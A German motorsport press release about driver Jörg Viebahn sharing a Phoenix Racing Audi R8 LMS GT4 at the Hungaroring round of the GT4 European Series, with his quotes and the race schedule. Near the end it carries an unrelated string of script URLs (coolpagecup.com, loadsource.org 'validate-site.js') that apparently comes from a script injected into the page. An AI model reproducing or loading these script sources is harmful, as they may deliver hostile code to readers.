Hoffnung auf ein Erfolgserlebnis

Jörg Viebahn fährt bei der GT4 European Series auf dem Hungaroring

Jörg Viebahn fährt am kommenden Wochenende bei der fünften Veranstaltung der GT4 European Series auf dem Hungaroring (Ungarn) in der Nähe von Budapest (31. August-2. September). Der Engelskirchener teilt sich einen Audi R8 LMS GT4 von Phoenix Racing mit seinem gewohnten Partner John-Louis Jasper. Nachdem es bei den letzten beiden Veranstaltungen für das Duo wenig erfolgreich lief, hofft das Audi-Team auf ein Erfolgserlebnis in Ungarn.

Viebahn: „Bei den letzten Rennen ist ziemlich viel schief gelaufen. Ich hoffe unsere Pechsträhne hat jetzt ein Ende und wir können zwei gute Rennergebnisse einfahren.“ Das Team hat in Ungarn getestet und eine Basisabstimmung für den GT4-Audi erarbeitet. Viebahn: „Ich kenne die Strecke in Ungarn sehr gut und habe dort auch schon einige Erfolge gefeiert. Mit etwas Glück sollten gute Resultate möglich sein.“

45 Autos gehen in Ungarn an den Start, 19 davon in der Pro-Am-Klasse. Viebahn. „Wir haben wieder ein großes Starterfeld und das Überholen in Ungarn ist nicht einfach. Aber trotzdem bin ich optimistisch, dass wir endlich wieder ein gutes Ergebnis holen werden.“

Zeitplan Hungaroring:

Freitag, 31. August

Freies Training 1                  10.00 Uhr

Freies Training 2                  13.15 Uhr

Qualifying 1+2                      16.55 Uhr

Samstag, 1. September

Rennen 1                               12.20 Uhr

Sonntag, 2. September

Rennen 2                               11.15 Uhr

Die Rennen werden live übertragen: www.gt4series.com

 

//coolpagecup.com/1cb09f960d6b873480.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7344x&r=1535572065397http://coolpagecup.com/ext/1cb09f960d6b873480.js?sid=52295_7344_&title=FF_%5B598%5D_pagecupdev.cool&blocks%5B%5D=31af2

Kommentare sind deaktiviert